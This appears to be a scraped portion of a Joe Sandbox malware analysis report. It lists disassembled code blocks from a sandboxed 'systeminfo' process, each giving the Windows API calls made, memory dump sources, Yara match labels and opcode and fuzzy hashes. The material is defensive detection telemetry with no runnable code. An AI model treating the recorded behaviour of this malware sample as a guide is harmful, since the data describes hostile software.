                                                                                                                                                                                • Opcode Fuzzy Hash: d5d30b173a49d141839cfefe32fcb7956afdf7be81d290523b2858bd30e4f758
                                                                                                                                                                                • Instruction Fuzzy Hash: F3E1E4B0D05269CFEB24CF98C8A879DBBB1FF44309F10829AD4097B295C7B95989DF41
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0056C5E4
                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0056C61F
                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 0056C62A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                • Opcode ID: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction ID: ecb505fc0d8c6ebfa0548872a4b5efaaa65673e8675f0fadb0f3a72ea2c51b6b
                                                                                                                                                                                • Opcode Fuzzy Hash: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction Fuzzy Hash: A431A3B1A00309BBDB20DF64CC89FFB7B7CBF84705F144458B949A7181DA70AA848BA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtCreateFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?,?,?), ref: 005790D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction ID: f70907193bd000615f24d6ff95da430484b1aa3c505c8d6da945eab7e7f21dbd
                                                                                                                                                                                • Opcode Fuzzy Hash: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction Fuzzy Hash: CF31D7B5A10209AFDB14DF99D885EEEBBB9FF8C310F108509F918A7340D730A811CBA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtReadFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?), ref: 00579220
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 90cccae70db432994000959dfd1fceacd80a30804f5c4610f5b406654ed4dfdd
                                                                                                                                                                                • Instruction ID: 289aa91bd6672f8116f3c17210a89c37c658d5d5803167c5adbd51132104d06d
                                                                                                                                                                                • Opcode Fuzzy Hash: 90cccae70db432994000959dfd1fceacd80a30804f5c4610f5b406654ed4dfdd
                                                                                                                                                                                • Instruction Fuzzy Hash: 7031EA75A00609AFDB14DF98D881EEEBBB9FF88310F108619FD18A7340D770A911CBA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00561D1E,2A4B6D90,00577F1E,00000000,00000004,00003000,?,?,?,?,?,00577F1E,00561D1E,00577F1E,758B56EC,00561D1E), ref: 00579505
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                • Opcode ID: 51428141bc61c25ce69973498f3e53e5da001e7ac444ae6020fce22643847750
                                                                                                                                                                                • Instruction ID: a3c6ee32a011ce6d043708dda72e254a50ce57df0b2ee638477813e0cc71fbb9
                                                                                                                                                                                • Opcode Fuzzy Hash: 51428141bc61c25ce69973498f3e53e5da001e7ac444ae6020fce22643847750
                                                                                                                                                                                • Instruction Fuzzy Hash: 192119B5A10209AFDB14DF98DC45FAFBBB9FF88710F008509FD18A7241D770A9118BA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtDeleteFile.NTDLL(0000006F), ref: 005792C3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                • Opcode ID: bbe50b243a5cf900cf766d7c061a869510e8dda4bbc257fabbaa2cebaee8741e
                                                                                                                                                                                • Instruction ID: 6780aad3fd5114c375a773d94c358d62de8b87e053d449bad6c6bb97062316a7
                                                                                                                                                                                • Opcode Fuzzy Hash: bbe50b243a5cf900cf766d7c061a869510e8dda4bbc257fabbaa2cebaee8741e
                                                                                                                                                                                • Instruction Fuzzy Hash: 53117371A506097FDA10EB54DC46FEF7B6CEFC5710F008509F918A7241E771B5058BA6
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00579307
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                • Opcode ID: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction ID: dc67ba3a805c7848889ed85ea287cdc5d1d2061bb1699bf524cb68af8f9e09b4
                                                                                                                                                                                • Opcode Fuzzy Hash: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction Fuzzy Hash: B1E046362406057BCA60AA59EC01FABBBACEBC5764F508419FA0CA7242DA71B90587A5
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 24ab62615a1443b4cb36e66193fdb81d2202be8cb85dc3db7b1c2e393a83ea4d
                                                                                                                                                                                • Instruction ID: 8b55cf99da5ba1dbfb0cafde46006e713c04560e47e47213cfb73d6a1bb50622
                                                                                                                                                                                • Opcode Fuzzy Hash: 24ab62615a1443b4cb36e66193fdb81d2202be8cb85dc3db7b1c2e393a83ea4d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A90026160150042615071584C0454660099BE1305396C125A0956570C8618D95596AA
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: f6728104a28f36cf203703fa068fb030b9de0c5d33da00b64d6df79330e422a0
                                                                                                                                                                                • Instruction ID: a149682a5648bd73435e89a6a014a66c2546bf58f8cd7851789069a9b59103f6
                                                                                                                                                                                • Opcode Fuzzy Hash: f6728104a28f36cf203703fa068fb030b9de0c5d33da00b64d6df79330e422a0
                                                                                                                                                                                • Instruction Fuzzy Hash: AE90023160580012B15071584C8468640099BE0305B56C021E0826574C8A14DA5657A2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a7d1f14307f24ef236058da6d90ed766b5bc49b9ba2e6d454a9a94eb53fa95da
                                                                                                                                                                                • Instruction ID: 89683d07aac0e0471fb910173e36ccb62407e65f69b27c8866db937396a1ebf9
                                                                                                                                                                                • Opcode Fuzzy Hash: a7d1f14307f24ef236058da6d90ed766b5bc49b9ba2e6d454a9a94eb53fa95da
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C90023120148802F1207158880478A00098BD0305F5AC421A4826678D8695D9917562
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 415fd4acc4e0d77ec0d83ca8214dde71d3835bb8998003e9aab3dbfbc64101dc
                                                                                                                                                                                • Instruction ID: 22a9ae0c4227ce5450569ec6174f6c7a83bd71dac34acf62f648e378ea855635
                                                                                                                                                                                • Opcode Fuzzy Hash: 415fd4acc4e0d77ec0d83ca8214dde71d3835bb8998003e9aab3dbfbc64101dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C90023120140842F11071584804B8600098BE0305F56C026A0526674D8615D9517962
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 969618c6c5d7f9e6f2c0e4750e5ec13dc3a9163289cc6f25cede30425b675d4f
                                                                                                                                                                                • Instruction ID: 182810e6a68673b6d73319305fb671f34209ec4700a5ee7e536e103720f0faba
                                                                                                                                                                                • Opcode Fuzzy Hash: 969618c6c5d7f9e6f2c0e4750e5ec13dc3a9163289cc6f25cede30425b675d4f
                                                                                                                                                                                • Instruction Fuzzy Hash: CF90023120140402F1107598580878600098BE0305F56D021A5426575EC665D9916572
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 20b04fb411ed3111bfa58ed434f358b99dd550739bcf732e8c23b1e10e3f6c93
                                                                                                                                                                                • Instruction ID: 5adf60f04338f3f0a391b0476c293365ac260948cc7f6f857cd5b6f096f8aff8
                                                                                                                                                                                • Opcode Fuzzy Hash: 20b04fb411ed3111bfa58ed434f358b99dd550739bcf732e8c23b1e10e3f6c93
                                                                                                                                                                                • Instruction Fuzzy Hash: 2890022130140003F150715858187464009DBE1305F56D021E0816574CD915D9565663
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a3a1f8bc84c2802989a7a49af91e472fdcd9ec0b1710381fea06779445678cef
                                                                                                                                                                                • Instruction ID: 0ed6480a81a77a4aac4d94ddef2425507a769687d85b49e1f03a2addb5f09bae
                                                                                                                                                                                • Opcode Fuzzy Hash: a3a1f8bc84c2802989a7a49af91e472fdcd9ec0b1710381fea06779445678cef
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E90022921340002F1907158580874A00098BD1206F96D425A0417578CC915D9695762
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: fc0d8e03588adf4ef8669ac2d0538013bbbd30ca74b99cf852be778603358e0a
                                                                                                                                                                                • Instruction ID: 28aacaa5892a3321c5e2f9c33e279211c0f5da48aa6503116129dce65d9f4d74
                                                                                                                                                                                • Opcode Fuzzy Hash: fc0d8e03588adf4ef8669ac2d0538013bbbd30ca74b99cf852be778603358e0a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1090023120140413F12171584904747000D8BD0245F96C422A0826578D9656DA52A562
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 0f41a04c9e1bd4466a465bdafe633e674827a43bed802fb1177cdee8530e6ce5
                                                                                                                                                                                • Instruction ID: aee38cc9ad1c54cb2f5bf4eed9459979fa20d937cfaa765dfe9365ab50fa9ce5
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f41a04c9e1bd4466a465bdafe633e674827a43bed802fb1177cdee8530e6ce5
                                                                                                                                                                                • Instruction Fuzzy Hash: D2900221242441527555B1584804647400A9BE0245796C022A1816970C8526E956DA62
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
• Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 399a4458ba542cbf10aabd738e21142037f05085e762018697e6e2c5a706f7a2
                                                                                                                                                                                • Instruction ID: 2007db79cb9c7e397a255f122ac4327dbbcc7d0751d9c7b1bca543574fb20464
                                                                                                                                                                                • Opcode Fuzzy Hash: 399a4458ba542cbf10aabd738e21142037f05085e762018697e6e2c5a706f7a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C90022160140502F11171584804756000E8BD0245F96C032A1426575ECA25DA92A572
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 26b3e4b2ada4272a657810ab5bbe7a0b1bdfd17d5188ed50b1d5706a465e8de6
                                                                                                                                                                                • Instruction ID: b1b075d431ad61876c2ae8d5385e1052a451f27d9a41b394870e367d33bd3102
                                                                                                                                                                                • Opcode Fuzzy Hash: 26b3e4b2ada4272a657810ab5bbe7a0b1bdfd17d5188ed50b1d5706a465e8de6
                                                                                                                                                                                • Instruction Fuzzy Hash: E590026134140442F11071584814B460009CBE1305F56C025E1466574D8619DD526567
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 28ba6ed0a9475d6940e0b2ffc245a7c7eca097c1f6bfb9028a34a6fbc2c0f399
                                                                                                                                                                                • Instruction ID: 8d9374ef5930bac99a8d1f80fcbbeb1fac37a6e74a2133f34b47105a935d8b6c
                                                                                                                                                                                • Opcode Fuzzy Hash: 28ba6ed0a9475d6940e0b2ffc245a7c7eca097c1f6bfb9028a34a6fbc2c0f399
                                                                                                                                                                                • Instruction Fuzzy Hash: 84900221211C0042F21075684C14B4700098BD0307F56C125A0556574CC915D9615962
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9cfb0dc34dd62e166723359775fadf5f4317d445eb7ee66e064160850ee5c7ee
                                                                                                                                                                                • Instruction ID: 04419d6d7d785ca121e3134a09c9678e07aeb2b42da6968585eaa1033ce19687
                                                                                                                                                                                • Opcode Fuzzy Hash: 9cfb0dc34dd62e166723359775fadf5f4317d445eb7ee66e064160850ee5c7ee
                                                                                                                                                                                • Instruction Fuzzy Hash: D890022160140042615071688C44A464009AFE1215756C131A0D9A570D8559D9655AA6
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a210c882bb535c36328824d2f5c115320547b7f53cd3181c448e2bba9506e77c
                                                                                                                                                                                • Instruction ID: 836c3f69176abfd25891b1b8c412e659d52d797835cb82880c26a93cdbc52cde
                                                                                                                                                                                • Opcode Fuzzy Hash: a210c882bb535c36328824d2f5c115320547b7f53cd3181c448e2bba9506e77c
                                                                                                                                                                                • Instruction Fuzzy Hash: 26900225221400022155B5580A0464B04499BD6355396C025F18175B0CC621D9655762
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 151a30e52830e79080de82ef2456b6ca46530087d2ffe20d9675df8735697c9c
                                                                                                                                                                                • Instruction ID: 460f72e2ca66e802296a6fbde03d69cd6323d11d3471ef036a1940df498bacc3
                                                                                                                                                                                • Opcode Fuzzy Hash: 151a30e52830e79080de82ef2456b6ca46530087d2ffe20d9675df8735697c9c
                                                                                                                                                                                • Instruction Fuzzy Hash: E7900225211400032115B5580B04647004A8BD5355356C031F1417570CD621D9615562
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
